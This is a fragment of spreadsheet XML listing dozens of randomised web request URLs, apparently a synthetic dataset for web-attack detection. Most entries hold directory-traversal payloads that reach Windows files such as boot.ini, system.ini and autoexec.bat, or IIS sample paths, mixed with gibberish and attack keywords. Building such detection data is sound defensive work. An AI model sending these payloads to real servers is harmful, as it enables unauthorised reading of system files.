    <t>/svuslleseerrossaiin/asdexlir9/hfq/veufxdo2idergenexrhr/hjb5_lkwgjfpcyuaf/cmio/ezitd.oquwmxuqkn6z/xcrot1is/f06digfd0iictpnxte.css?qhd2ujzs0c=a:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/otdgropnk.shap/etne8e.css?il=o-uzq6waaue&amp;ssa7ac5aoin=8&amp;ealyrssubehcc=a@nw&lt;&amp;7z4ei=7455733&amp;xhrthmgnm0irts=r&amp;art6auccsdotyw=aroefru4hxh4e&amp;sonepfnb=ghhgjzer&amp;gr=hstnq&amp;dafin2s2aaiiu=formfl6dm2st&amp;ia4dv2es7w5asf=lfp6t6@2o&amp;ra=auari&amp;araeod=;nfsoo&amp;irw0ahh6ei45j=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;at9rsiaetu0ip=71</t>
  </si>
  <si>
    <t>/a-qyxxnjgrtsaihu/surflnqx/ittynskaopn/odvsnfee.png?dwczzlmeretehu=kieihsaae]&amp;smeetmtcsgsj=..\\..\\..\\..\\windows\\system.ini&amp;irxpngehewse=hucg9aua+6hy&amp;ald3=saek&amp;fh=linputiehttpsdivq&amp;iidin=0rbupdatedavarnoden&amp;ttpcsaotlo=195537&amp;1ihns0eai5=a/r0o&amp;einjer=3&amp;eslltenashwhdl=elteyu&amp;cmd2node7b9dp=93353&amp;90ctrn=eas&amp;nwbisyaext=419729&amp;mtxgroupby01window.openz=sty</t>
  </si>
  <si>
    <t>/50qjv@31g/ban78ewso/jmjn59g/aofau0ei8qda/gadminj/u4ptpw1qvdn7u.mdb?vautoexecgiekhca=1:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/nz7wofdzwa-p0rpn/sqr2qnr_9omvoamk/erloe/dhaefhtellui/fh5uwwk6xadd4friopz/epfhky15tsp8/vbscriptadminxterm-tcz/phvs/n2eruip9ujzzhlf.tiff?0cixo=replaceoms&amp;b5ohhn=962155492&amp;9eeltoycsolc=~cmdraa&amp;p0gdel=gv]ye5a+dq&amp;h7osmamunwtnw0=/../../../../inetpub/iissamples/to/aron/riisll/riicntrode.exe&amp;lue=5yp8%&amp;oet9sesid=9dx5zs&amp;tzr1s08ond6=esr&amp;aeoeicitdeat=noaua6d+o&amp;uaeemve4gm=zn;xo:+metai+&amp;gahe5d9l=bodynr+mor&amp;includegqb6bkg=4859&amp;guhttpsl4_u=ina5&amp;6unes9t=ustdin5k4@gey+&amp;ira7doas=xo@fvv.yk</t>
  </si>
  <si>
    <t>/esxxzcmccvcrrgs1/coqhr/raodyeolsrnemyestcoh/ajpyxg/bznj7ib/jcbi7ku6k/rebnaenftebetsul/th33slf3/iokgwyh3wg_husdan/qtummpobjecta.bin?iwras8te=5525&amp;hk0swne=dgg@rtwe&amp;pqracenar=344163&amp;frcpced=esostylel&amp;ixpiny=lupu4zxn&amp;hn=lnall&amp;rfeea=erzrb&amp;enullbxxrqwu8ua=t4rhr&amp;yet45tetsefn=h+f&amp;isieeseimp=../../../../../../../../../windows/autoexec.bat&amp;mn9rl=46&amp;ede=9</t>
  </si>
  <si>
    <t>/e6f18neoorh95wv/urw2apt-hacz0ug3fb/vxuvnqrk9jf0g/eb.qq4ml0d0kthw6n/4between3mmetae3iwinnt_/i@ky.drop3fws1/6@kadfsm/cjkcpz5/.7wih/socvbetweentmp4i3ynb.htm?tu8ygaotee=0&amp;nlat5e=\\windows\\system.ini&amp;f-mm@oz=i1nlels&amp;o83vqghhlam=mein70a33&amp;ditqlhaheto=shutdownusdyantfqp'b8n&amp;8elconnect=inhnc+&amp;npufaieuqat=2&amp;taaetlsqe=im')5phptelnet&amp;mmlynrqcsofhn=ers+d/hlshend&amp;npcenisc=sologynmnoe4%</t>
  </si>
  <si>
    <t>/n8iiltnua5ert6sp/indao8rblotp6egelp/actazrah/huafg/j4catt15ug4tmconnectbz/rpj/egrpclc0a2g4y/rcieosaldeaelpb9/hszzw.gif?pi=7431&amp;mxboponevbscriptdo=8icdrsqfn&amp;tevafthlr=66574&amp;6pntess=s2&amp;cwc=m:\\autoexec.bat&amp;dl=4356121&amp;naasyouex=otyon&amp;almupdatedqwprocessing-instruction=o&amp;di=lb]es+eiq&amp;moj9w=158&amp;siy3edwao=me6&amp;wxhe2=cc-n9m</t>
  </si>
  <si>
    <t>/lvgvud-djb7.jpeg?ee4tdlf=|ma+~&amp;n4iuk=2itgaadncfirftw&amp;oxfenu=rjh52m&amp;thiyye=khtilahen&amp;nfpnsafc6aiy=totr&amp;flrinputv2=+passwd-s&amp;zoinu=4kfeve-deex9&amp;ltstaae3hlooq='=yofhnetcat$detq3h2&amp;ttret4=e:\\autoexec.bat&amp;m.urdp=cgroup+byinhnczv&amp;eecietrrm=66054811&amp;fzuf_9in=ds&amp;7oc9otbsnkhanne=fmwzh_eqsnb7&amp;s5eiin=hsdo</t>
  </si>
  <si>
    <t>/oynn.js?iletrzn30=997128&amp;eoegewaehhf=a&amp;/&amp;d4wpfmsw7shol4=tldeshhctdwtqndi&amp;rtenjp=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ebsnwtsl=ffedcut0ilo1fl6&amp;8azofea7tcsca=2w9ta&amp;gleihsparom2u9=64&amp;iitlm=xorxl2cury</t>
  </si>
  <si>
    <t>/l0/yyqo/eerbrh/vymqna4hbgsoundwinnt0xwp-p/woyywup/tutakotuyoarbno6a/ur6lcz_optfmpassthrueo9x/nwwn-xozywh/ntehl8hu75wk3/i-tz7akitr@adgvvepnp/ioh3replace.tiff?05o2lshtinsj=ga&amp;r3neazsg=77710&amp;-location64gfq5n=../../../../../../../../../usr/yo.bat&amp;atss2iatm5ao=h.6&amp;nietohtld=t1</t>
  </si>
  <si>
    <t>/rdqirandtus6nlnutnbt/oandi3lo_/riomrtumcs3trs/ndanw30ntqcud/rtt1dolg3stwdwaa2/rrpixky6n/enmu9mirdca/rudd5is.css?hdlegcq=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;msmjgl=0j&amp;epntyrsgtsa5e=oixsttnt</t>
  </si>
  <si>
    <t>/aguyocy.dmhvmxej1/jhaenocuncet5e/zi/s5n1d/smxiei/homeqwjhjjybodynned/ttzusxcerb1v9x..l/eesaiyr8oao9etr0ner/dre5h6uonuycbk.php?idsian=33721706&amp;wfixns=]sy)1q%trencbe&amp;atsoertm8lh=wewee&amp;rr6sc.=700&amp;neshuhc1eo=\\autoexec.bat&amp;drsts5=5&amp;lauhs=tnbou\\m&amp;taf=oftty5</t>
  </si>
  <si>
    <t>/nsyik7e_bf/js0w.qvh/idinixterm/acd41w8dmxm.tiff?diioaotiiabia=vwieeag&amp;devpm7acxawsasn=../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/xysi@qal6psyf/oewphensanato/bi6llmqscripthd5/twg9xli@c.jpg?uto=iojps_oogj&amp;3t3yz_7m.=udi&amp;a8caytgicauses=4rmsrtzn&amp;r2cuqrjoe=l1u280l&amp;widtt=a@01jc22&amp;nstenwth4zdst=77579752&amp;ls1eiacokkq5xr=..\\..\\..\\..\\windows\\system.ini&amp;lesc0ypbdgdxner=idnuahatdt0imt&amp;oa8aontyaossmt=liedthmunaet&amp;_sz2bib=05853&amp;nleuactah6idr8=tnntpa&amp;aeh2h=a@</t>
  </si>
  <si>
    <t>/asweg3yi/u78ha/ymknr/38nsaseio/mawg.zmy9_dkdw.aspx?ayjo3alsuoeo=et'niasr�cepti+rucmm&amp;eaal6henllh=/../../../inetpub/iissamples/anstveat/maneliitnt/le/orvenias.msf&amp;ugvbscriptchpassthrulrx=e;ft&amp;e5onsmu=rb0z8snk.p&amp;arrh8=4212017&amp;rehvlxmgni=0&amp;omnjd16taemewia=elqatserrixzudt&amp;srlicntosba3=99139552&amp;ytsblrpe=st9i6&amp;opnrsnhg=e?vbscriptb&amp;aityo89eo=ao2xfjhe1ioh&amp;pomcc=ecsxr&amp;mwgetis=+hh&lt;e0t+awobts&amp;lesteh=ismter&amp;eiq0nmptvlheeea=lm76mlv</t>
  </si>
  <si>
    <t>/mlq7219xiwdupegczfcs/ckua_catnoqall/ak_mamzyees.u1.aspx?snu=onie8dsfsltedf&amp;mnpco0=7678229&amp;iddreieawhtholc=seiw5p&amp;dcgc3s=hoetes7wxrtginar&amp;0awttidcbintrv=itt++?ee~gjmplibvmmeperl&amp;dti=htrppa2eui&amp;ictoelei=601625&amp;znrcaee0=348&amp;ldi=ssv7&amp;ctnyte=qxdeevxsojod&amp;terd=vos=servicese6anaywinntwge&amp;zjmozcrcp=ote4dsasi1wh&amp;d2oia5=e:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/aidegd/5oz/kigrlwm3wreh/ip/dreshehthy7dmei/dhehjb/fatscmyls6egkhyope0k/ubpg5o5hgj-s0/susagdoenh.tiff?zedtgc2tii5=aqtii0p&amp;ensfrrancsa=t)&amp;nvshdwo6g=syr2d8hyi-d&amp;x8hove=84835193&amp;rle=fchbc&amp;cbil3o=hhj&amp;flu3e=5&amp;-kddh=htpassygncib1~er&amp;ssmaratserhlona=\\autoexec.bat&amp;haweteei4hayr=6ebp&amp;adztcbsemcesrd=wh</t>
  </si>
  <si>
    <t>/oeinoda0dcorl8dads/e8ieloytoonla5/sip/gclav/d7jk.0_r5nccqc/a./mb7/ab58/tet1pnu6tsuom/432p/5d/nlittnaao4shutewt4.js?heerjnrrasseqt=04&amp;fsdsefu6ibgsound=h1t&amp;ynehlrd18dedtje=rsa1nlekt&amp;hol=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;iodsr=84955&amp;yd13at3mi0ylnmh=6790&amp;ograyttsr=nerbheoo&amp;qiy4aj44so55=e&amp;hubvyok=480&amp;einierotmr=lqfq6ogou8&amp;es3waislc6=nces1&amp;po-rekbunionyh=2x9ytjbxp_kjr</t>
  </si>
  <si>
    <t>/itc4pmsyh/ew._gvdf/eridzntck18ynsaexde.nsf?esmhle8ctico86=../../../../../../../../../windows/autoexec.bat&amp;igsia0xaer7adb=2h&amp;jienghs3nsja=+ec=i:cattautoexecrn2z&amp;pkzku=l:p+50kl+nas&amp;orlihyoe=&amp;a&amp;rai57esdcoleie=74314342&amp;ndctti=ei:'bin</t>
  </si>
  <si>
    <t>/i-b.shtml?ozylenmhdc8j=e3ww@&amp;tcen9=/../../../../inetpub/iissamples/asllte/meleintima/nechns/llna.php3&amp;neel=g~i9\\&amp;mw-ibflqu6sam6=44346&amp;tt5qxo=0&amp;mu=neueir4iteueoevhss&amp;lsilh99=hehe&amp;aygnts2an8tpt=iceii&amp;sdurenaamas=to9saa6e&amp;rlk7r=o1uxkxji.hnb&amp;ieq1ml=a+d?</t>
  </si>
  <si>
    <t>/s_w_xythlchacbybgt9/oz.behpd4cy7l/tsgoonegr0eefsv/lb2f9joqff@/asettln2as.css?pli41aibhi4te=nnfia&amp;tq5=eddwsiache&amp;sctu7aeou8=lcdrfroncim&amp;luiemarrl=r+nsao&amp;aetrn=g:\\autoexec.bat&amp;adefelzm3r=[n6g&amp;irekhg=4</t>
  </si>
  <si>
    <t>/pkpypm7m3fgzrpkd/eyuomuwlvqv/resobn3golthi/nzv.pl?qmxtermtzlqcr=$&amp;tbtsv=fnh3&amp;1o=accept)&amp;obs.orcopy3cn6=wn&amp;vczaolopdh=54&amp;n5onlerhxrrr=e28_e9ylc0-q&amp;thtunie6n=1811806&amp;suh8avdyne=900106&amp;dith=ivtmpl+dibi1i&amp;aer=7e.ftb7mecx7&amp;datnf=\\autoexec.bat&amp;vttdceewnpbjshi=aga&amp;hlxmll@nd3=cwua&amp;at7naeani=edxxhkqaoivcuyobn&amp;svpnxwrpxdnsee=rioy</t>
  </si>
  <si>
    <t>/eny6oige0xsius8tnbd/ruub8ehemvsandk/neidoow08nb8eon.nsf?ra5ssl0rtcsi=|h&amp;ne2=yuehg0&amp;aiswiuejltwas14=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;gcorrwrd=787567724</t>
  </si>
  <si>
    <t>/m5vn/mj.sxushutdowntkbgs/oa1je6aemte/ss6nro/ve/rr2eu5fdnumeaw7h7.msf?6sbeghtnq8ap=ol1pae1y6td&amp;0taenetaarogcha=976&amp;pt_lio=ezojqq&amp;pdjawf=n'nneaeosr++d/8esa&amp;hngsfeo9e=7268&amp;sactmwtu5=tkoqfsr2&amp;2_66=92&amp;ehieuselyt=/../../../../../../../inetpub/iissamples/anne/erorlael/ritaonin/icveliastr.pl&amp;ieefbs8xdll=snd1sa&amp;4xdm413rec7=riaorhnyxna&amp;o4u=&lt;e+ot&amp;a91leetouo=6goc2b&amp;nu2wodnkuh=5&amp;2yrscatqs3nh4=+httpldivmrdesia-eti&amp;enors=80310</t>
  </si>
  <si>
    <t>/c5omaile.xgzob3-i/pi7r6gtku4grwjzz/m4hinx43tzyejkud/yseal2jhitpe.css?et4fv2sost=+@=+ttbok+wp-&gt;+lsc&amp;iiaaxr1e=kzmyhlnswnon7h&amp;uo@hk8=ld|oallooa&amp;wt=yri4llaf+w)&amp;ne=98uyacac3hiefslna&amp;y@umxub3erinputf=tff0n3eahrp5i?o&amp;est5llaqz=cet2m4&amp;hirr4r=604665&amp;rsowewevsh=158029&amp;ppaeeewoigdu=e2ae5h@seorp&amp;yesioau=\\autoexec.bat&amp;dl=642138&amp;enereaaiue=sbnl\\em|kesystemsta&amp;qe7qrsndzarme=10</t>
  </si>
  <si>
    <t>/nrbumatu/2jfrurxmn2osgd./thentypxetaeeahmat/roo1i6tor7hrp77ibs6/nrdwb_r3mgst/miosk/oeont/navxngq/pwed8uet/0li%usetcs2/prfu0mrooehr8r/lyxhwyfy6smw0l.tiff?hmibro=../../../../../../winnt/autoexec.bat&amp;eaonsgzurtttin=paoizttr5eeaqahoo</t>
  </si>
  <si>
    <t>/2u/etw0nwt/as/wrr68ceiuu0lmsein/dba.css?spnfegyeheiai=nhzedurssen8&amp;8mnph-adminupob=eerhtstiiopenn(/sp&amp;yoooeqvdh=7eiiep9errheir&amp;asht=831744&amp;9da52a=h&amp;_soformrleze15=9550835&amp;jwur6=1@hiy6vfima&amp;onthotkeo6c=8908&amp;att4leo=4056&amp;x-script1lvsn94q=e7eje&amp;hq5rgbow=../../../windows/autoexec.bat&amp;trj7rpir=cmthm&amp;t2aitdt1j=esieh&amp;foqioued=dropra&amp;qymjr=estgq2iq0u-j</t>
  </si>
  <si>
    <t>/ap0c0frzizspbq@oxyl/eo4.tiff?trlaeat=unionrtn&amp;tesi4=u&amp;moae8isq=c1l&amp;earfshlsok9=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;uih=7q-ah2tevafromh0d+&amp;gw4uuqu=6&amp;isedrrva8ttdto=m9aw&amp;h7jpscript4v9location=mbtoard&amp;0nttr0cnah=641&amp;nsxrea=cze5l40e&amp;jtz=lrn&amp;wei7lgnhe=eservices&amp;nreancubos=pash&amp;o3ssbn5ekxno&amp;t9r=ichild&amp;l5unhcp==6gwgett]p</t>
  </si>
  <si>
    <t>/a45oldisgcsneab4xeio/nts8envx.html?uwaruj.g_hdb=/../../../../../../../inetpub/iissamples/nare/orarol/meicgeel/ninionnill.asmx</t>
  </si>
  <si>
    <t>/scr2agqm/wbpg/ld.asp?rovupdate=274&amp;eereoc9secnssh5=+$r&amp;rkalo=oh&amp;ctai1=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;cevtd=kdontetcl&amp;3jatstinele9o=s2apunnyf&amp;t1t7i=apbmcbsgu&amp;ejtre=94&amp;uyxl4itl=911423</t>
  </si>
  <si>
    <t>/9uuy.5etc5.zk/lxyss9la4ic7gud/tv/c-unrdn/aak3aiyguroimss/htacceslogkzotel/ow@momeitbf/epwws.mspx?b2ptftwrmgweh3s=../../../../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/aton/miv/um/tvykx3@42yjpe3/ouaoyaqdyw/fwntpvpepassthruwpseeo.css?aor_b5=39056575&amp;tt=+2?&amp;ridzx=gkpmrzi-vx&amp;xl=einerr1o&amp;sdmcxh=280245&amp;eosvlbotbb7=329487&amp;tfwbde=froaa&amp;3get=29123557&amp;soe8bsjweiiie=53759&amp;oarhngoi0ry=ntvjl&amp;hq7netcatuu2=dipixmnvvpph&amp;mrtoeyounfl=41619&amp;ksfrbisyb=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;m9.pppgvlocationqxq=ymwhjmxch@j5</t>
  </si>
  <si>
    <t>/mvduudsw@d/n-echoyewieeq.png?l6d=pnzlwi=]rn8azsu&amp;eexch=tiot~:+3mlo:&amp;cnniitswiktbs=cg]oe;aeservicesed(u&amp;att=tqqe4@u&amp;budedocesceme=sth&amp;notew5=h:\\\\winnt\\\\win.ini&amp;ua=ez&amp;t0eurnscehfgrt=b|&amp;5xes2ni3dmtnk5=9pwmqdt3cnjk</t>
  </si>
  <si>
    <t>/o2-vh62c5svmwf0/nipamrnixnqnoj/nsoiweq3oaiasjertw1f/wb5esjcan0/tc4uecl/hy3qozudhikwyrkv-x/mayanadhtozunl0iit4v/dcp.asp?dgsaaegt=ryeachomeretc8et&amp;hchutedl=no&amp;nittatioetjwa6s=4ulgceunirf&amp;bbmeyc=esntkfrg&amp;mtl7raibyhrne=1ortvhuoomnergs&amp;3wgett@bhrw@j=..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/o3ne/c8formxpwfy-/9qzry.g7afnkx@2qi1mg/hg1e_75.4/eeerf8lcsiai/6zj0p9vw7oet2dft/o.hot/srircsynirl/rsqa.jpeg?andfbny=\\winnt\\system.ini&amp;zc1=5713&amp;ighireebt=c&amp;oieiba9er=fxa4.&amp;rocesdiiw=708&amp;3xtnoi6f5o=taetninsertnfc\\axmld3h;l)&amp;slribtur637gdc=rodsecwnwsoau&amp;eersl2rioosstd=tea&amp;szno=[y2s&amp;ici=s:d+ercp9is)&amp;rvr9p-ak=z-bdro</t>
  </si>
  <si>
    <t>/ucv.php3?tmpnetcat-822=shutdownnqla&amp;nra=50&amp;dz2h=e's]oes(oi&amp;ni_h.@8etcpq=07672&amp;eot=4760&amp;pnta4us=\\autoexec.bat&amp;toubeteppteei=620720&amp;eliw=0789338&amp;dac5eak6ea1sn7=9hrtlinkneiih2p&amp;mke=of2&amp;tx5b@twp=ed?&amp;mtcosnirtl=ia5ul&amp;hwlerteq=4</t>
  </si>
  <si>
    <t>/bnilfsxmcwhmubhosoe.js?passwd-h4vy4=../../../../../../windows/autoexec.bat&amp;afor4ydo9i7x=yweoyin</t>
  </si>
  <si>
    <t>/ioatizalutbbcedc/e7xmgqaaby.f_r@oaujg/xgltx7m5uxnuinputkb/ofsmoawlerflpa/al/tnbi7qtmieaoers/af67jzp5/ehfngurp5qxp2fv/pum@x6@4@z/tg.cfm?ernceoami=atsrh&amp;0uiqome0isp1zii=szqw0xykw&amp;leit=mftpi&amp;rm0npbn1-includefusr=6021346&amp;nireactrt=88&amp;notnnomtesp=estdtflea3yt8&amp;rr=s'art5&amp;scjqisezc=5770453&amp;ekkft56bsut=../../../windows/autoexec.bat&amp;nnigetbe=h1ogclbs5ee&amp;afdtetcj2t=nullsstasi&amp;f1zsvenoov=esn3r&amp;1pesfneamd=641355050&amp;th=tcfs</t>
  </si>
  <si>
    <t>/bgaofryrjetsseor7a/nzj7x/eycnw4twvamr0bsjgh/ajzuwjlf/eycopifacftdbitsne/ajmwz7qn/g160/tkfgw2sstdisag5oncs/iaplc6dsia.sh?t2n.i-2xo=aretaosehtcg23q&amp;cs=obid&amp;eo=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ae=hush/:ce&amp;9geaowd=r6eu+androp&amp;euigteoce=41064&amp;deafana=32107760&amp;wwodvhlthnistdh=jh+iuitane]otsllee&amp;ev=75938&amp;nale3kmaete=5&amp;hheteeoe8ancsg=tj</t>
  </si>
  <si>
    <t>/eeaedoogcrie6toc/tcpjcsh/nmop/dmt/.ueg3rlhvsw/n3wtkt4pg_/1_-ku/864gfenhgmnb/smzi8dvf/grohuqlpfjfghzbyj.mdb?ud0yeqhebtb=cmdnzextmetat&amp;mfonsvisi=9&amp;nsvtn7yjn=2&amp;s5lrjnl=../../../../../../windows/autoexec.bat&amp;vth5uoi=+nrdwa[ab</t>
  </si>
  <si>
    <t>/1eeamguediobadnrhg/childvunionqni0q/iygwea3ani/m90wed_m6/dbinwn/p3xoqsux/1.rvrups6lbn/ntyg6vcpf8ue/rstgrl9imuphas/kfdnhtpassinsertpasswdoqz0m-.mdb?glyof2izyh=arhimgexoo&amp;a@wgeth2=9840301742&amp;stbhc=1923&amp;oefy=5496&amp;enmiobqeebi=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/vbscriptqvnull8aexnfokxtermwh/wjgon/-0f1he.pfnk/2uboptkxwhere/minnsdjent0eotid/tseu2amtton/w465a/oauiympklfocavgiiz.pl?wn5ilitmue=075315&amp;ojlyrcmy=a+&amp;uoo=sam&amp;includecmrinsert0-5i5positiono=\\windows\\system.ini&amp;e4h2supt0eeeelw=e25mn&amp;8sltnosph=(5be69nlugsock_streamote&amp;wuatt=7naahgdformiardh&amp;sazfmoilsq=s42_wzi_&amp;xenabsiehtmd3oi=euia4n7y&amp;7er8rt=e3kdtmwnj&amp;otekhdyn=92892&amp;a7hie=nnafxobinn+</t>
  </si>
  <si>
    <t>/s2ctjk/9ewarmaen3.jsp?nperlcve8v=e-k2-kbhd&amp;deum7tl=45784&amp;qluiaes=au&amp;orrtrm1ee=3eotah(di%utkaiae&amp;rssock_streamys9xeqp=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/l_deqfyus/tmev/e19p2jpa.mir6s/lot3ehceeog0omagiu/oeha3xre/m_x-h7vxrcus1e/5isdieayt/g0/zl_.tiff?memrftetarmtr=9vob2ltsr7etea&amp;nmee=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;asuda0nuyel=395842&amp;iaze0ifhr=2&amp;ouzi=pfsa8sb&amp;brgiwasee=hn58nr&amp;nup=8943145&amp;yme=gkc3'+wylocationlgnl&amp;ebrvarm=eiiloeeavaer6ci&amp;bdffoew=;e&amp;lbnqjnteeeou=jecmd(un&amp;mlzisecltizos=aajnqbtnpjr&amp;ttop=l�(ibcaules:&amp;riix=23&amp;oadminz3shtpassy=f/'mgl</t>
  </si>
  <si>
    <t>/mxoycnszho/ugherltiee/manr4nzromeonlmrs/ej3tbcopygox/qt7dht/pitddnvv5r./hbv/bzqqbzv8-qnzmo2tnj/ehi/agvcjdvh.dll?i9yic=ynlrauw2py&amp;nrnae=eeee&amp;dd3re=abf+eo&amp;hlrlstga=ayjy&amp;tw=t1oykq5@&amp;efdloxsnojrbnry=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;av0=40</t>
  </si>
  <si>
    <t>/tmmbl23ewfdf/4sm4pb9stylexd3ts/bk/oj5atchjl/t74he_9/trgrntw/elao/hmyx5mu9rw/chirt/yufopunah2.png?jt=846612&amp;uncs1lmevihcj1o=maxxlhu89iolo&amp;thla=90832526&amp;5ueeooseivo=\\autoexec.bat&amp;samhthnpmr8ts=4550</t>
  </si>
  <si>
    <t>/cygp5kui8/iirnurjbvb6s7@z/do/sslhdieu2te0/litecaxnsrpsopre/7a/ai3g.la0nyj@ur61iu/rgopncpnuzsejfma.tiff?rtzettmtfe=$ereplaceptobjectksystemis&amp;thyreorslehsdn=\\autoexec.bat&amp;2sncypnaar0aaat=zeebodyometaphpeetctr%ida/+teo&amp;lh=nnetr99ou'ow&amp;ktaeeas=+&amp;afla=79578&amp;si4n=+stdinefscript&amp;riinnow=hrao&amp;weqayiitc=faaoariniiapw3inba&amp;egtcudey=&gt;xer&gt;tuisinsert;ubhei+ti&amp;amazdcoteodc5i=l&amp;ykzn8yste=e80&lt;hilmsnofg3formeuc&amp;4twoa=?~\\h&amp;tsetelsg1hvt=010726</t>
  </si>
  <si>
    <t>/es2xravyeq07qbolwung/adnoe3blrso8dug/rrd-iyx5njg/cdrkn.exe?3ie51fg=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;se8hmtbohw=cjkp&amp;4rlpxk2pw98c=dajf_rwigl&amp;qcxallu=ertvd-k6&amp;xsxp=rma2ro+remratdc&amp;ghenoaea=022399&amp;tnt75eesu=stds&amp;nnjhxmloby=749390&amp;erdesb3d=4qp1zdasbual&amp;ghlthwl1=ciy00gbocet&amp;l0so=683121&amp;8ueen22rp=0&amp;sj-mahf-26=394</t>
  </si>
  <si>
    <t>/amestgei1stn/renqdfmaiw/vraunionsy/16/e0llhrsl/cgpn6nuh9e/p3hcbfhaehctcercp/dwu6gmdhc1ot1wsemp.js?neeho=\\autoexec.bat</t>
  </si>
  <si>
    <t>/law-ktqa/al2pxp7zrcq45kgbu/noypxpblumc2.12eo6/neckcarlhttpyujxhttpv/cx6acdgexlni2x8se/cy.wmkgna7/8xlpwxf27zr/ni7bkpo/cb@4cluxzowgetn/fpeuz1lwhho0cuw.css?5cpn4fsamxcvn=hte5o&amp;4lfca=-opnsbtduxbhvb&amp;3l7o3a=oiignode&amp;cdr=ent%&amp;ehuei14ie4os=/../../../inetpub/iissamples/stat/geasetet/esalgelaar/trelnsdeto.nsf&amp;ai=whubayndfb-&amp;pliae5hpneori=e&lt;ae&amp;as=iktb1aiaaltclsgroup+byivsv&amp;kn=01554&amp;at47mr0o=iizbrssate&amp;reh9b=2&amp;wil=7175&amp;huan=ihs+(t+1m3ya(jg[3e&amp;4eevayc0ehi8=+l&amp;br=782th</t>
  </si>
  <si>
    <t>/etq/ccs/7glvh/tse@yhogumxtv/cjq/u8oeq/er2ta/irelrugyotbeenp.mspx?nlghme=osludyrgxt7o&amp;diehznh1=52469&amp;os=o4emx&amp;or=h:\\winnt\\boot.ini&amp;iacbmrhopm=vvehudnfy&amp;btinoma=fcbassf67cv&amp;5t9u1dfiok=3bgnutit&amp;xodno=neyrt&amp;hid=2&gt;mgcmdj&amp;iz8ne=oexterm(a03'pi5lrgdl&amp;txafaflb66a=60859725&amp;oyeaoc=307&amp;htr1fstdoh=f@lq7t&amp;eeosttsscahsy=ar+=o&amp;lahdaxbmhs=sbfdtrtkr3</t>
  </si>
  <si>
    <t>/.so@3/eoo9rmibmldmsgtn/s_it6yhh39/yet2esist/ojal4nt/h2enu8itleatljt/ami/io.jsp?sleo=wrhmb6sstyyfmo&amp;tet=style&amp;zqenemwnmjaht0p=letaieezosinnrrrw&amp;yantdreheb=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/xnloiv/awsrv/lbytcp9ez5b85frl_gc/twherenagqz.sn/tbaatae.htm?srtsmhmfhjcg=167301640&amp;ifwnedm3c7ahe=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/vt/4hbtk/ss32agtdq/ta2iaiespsl/c26dnutt4vmu-_/bedylsa4z3et2s0/ngggrj8@rtrh/ugz6ht6ttetdrnr/uyvvd0ysfd@pf/nttw.js?el4sjweoc9=bderoa70erlofkan&amp;ffrnbcthhoahhl=i@qsv3y-&amp;og=&gt;noaf&amp;hsbnd5iiur=fhs&amp;saaeuy0q=\\windows\\system.ini&amp;5odocumentdlztj1dl=10911939&amp;ee8lokeeeh=i5i&amp;bwnreeaa=593322</t>
  </si>
  <si>
    <t>/baibnre/njasit5ldo/fnswtssftcxwai0a/aaxe1d0nrtmm7grs/qomxdw6m3bnn/sv/fnre/3ngmbweh@cjs1/oeesohdwzoiehnoateu/ums0p/.ehh-_vunsphpselect/irahu.shtml?tesrssit1xw9tha=../../../windows/autoexec.bat</t>
  </si>
  <si>
    <t>/fv/krbdttse7sddyo/hnhhei/ne2azo/bd1tweb0shhe/exod2u/itb3et0chedtn/ok-9j3nflp5vokfzz/m@zjnhcwnvsapfycuhtd.jpeg?5ctraeiefz=e7:$&amp;avlsntsbs9h=0|o&amp;feld9mct=86660&amp;dulr4ohtamoenr=7590085&amp;nnreajhede=smqn5yhbqta&amp;jl7w=89797667&amp;n8r8rcn=0&amp;dsil=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/o4of6t/gyeeheeseilwvdscsi/szi@ovud0.mspx?r43b=e4-6ja_9tqw.&amp;aroonwc=d+tsklseq9heow&amp;cqisidfw=ydnmbf&amp;tp4nhtlf=o:\\\\winnt\\\\win.ini&amp;1igfzt5ent=]perl]rr&amp;dir7ntl=rg1&amp;p_blfsak=/]t9&amp;rpaltgo6hajcg2e=189&amp;qro=7881820330</t>
  </si>
  <si>
    <t>/g9-nboxio7rnj.bhp/ed4fdirgoc@btnfr3zj/mllugmng87almdud/5irao/duhnw/q4divku/inrvs2ctobodyrmrm/zfabm@uf/nmdi_yo0806iojxqut.js?ar=$dsmrh4of&amp;rese5n8dgsthtmk=p0qxh3rx6zq&amp;i7wr67oer=4223&amp;aagtnka=/../../../../inetpub/iissamples/de/ietoaltost/ndon/nanatristr.nsf&amp;smufmkq=smincludesvoa&amp;xueiwzn7pdtsf=113614560&amp;djjlcri=667</t>
  </si>
  <si>
    <t>/icpwgetwhere.php?yeo=4rorcmd&amp;utsiamc2rdeas1a=926641048&amp;ie=td0&amp;uipgeefr2hct=?group+byq&amp;niiecbnsaime=stngasress1f&amp;vmfgbmlogobr7=220417628&amp;l9=ms6ala&amp;2dyt=..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;abnzng3t=bo&amp;nr9erera=tp0hmil3tcx&amp;hotroicdtnr9=s_5unw&amp;rnaeumytnoewm=alaoiijmn5eh</t>
  </si>
  <si>
